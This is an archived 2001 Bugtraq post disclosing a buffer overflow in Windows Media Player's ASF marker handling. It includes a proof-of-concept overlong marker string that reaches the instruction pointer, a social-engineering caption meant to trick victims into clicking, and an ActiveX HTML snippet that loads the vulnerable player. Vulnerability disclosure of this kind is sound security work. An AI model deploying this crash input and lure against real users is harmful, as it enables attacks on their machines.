Bugtraq mailing list archives
MS Windows Media Player ASF Marker Buffer Overflow
From: "Pauli Ojanpera" <pauli_ojanpera () hotmail com>
Date: Tue, 07 Aug 2001 21:55:00 +0300
I dunno if I've sent this before. If you embed a marker long enough in an .ASF video file you can make WMP crash when a victim clicks the marker drop down list under the file during playback. Use ASFCHOP.EXE to embed the following script to any ASF file: ----8<----cut-here-----8<---- start_marker_table0.0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements! end_marker_table ----8<----cut-here-----8<---- As you can see, I used a catch to persuade the victim to click the bar. When a victim clicks on the bar, WMP crashes at offset 43434343 ("CCCC"). With WMP7 you have to use an ActiveX object on a HTML page to launch the old buggy WMP module. Make sure you set marker bar visible in the parameters. I guess it's the parameter "ShowGotoBar" Dummy example:<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1 name=DSPlay1
type="application/x-oleobject"> <PARAM NAME="ShowControls" VALUE="-1"> <PARAM NAME="ShowGotoBar" VALUE="1"> <PARAM NAME="ShowStatusBar" VALUE="1"> <PARAM NAME="ControlType" VALUE="2"> <PARAM NAME="Filename" VALUE="a.asf"> <PARAM NAME="InvokeURLs" VALUE="-1"> </OBJECT> _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
Current thread:
- MS Windows Media Player ASF Marker Buffer Overflow Pauli Ojanpera (Aug 07)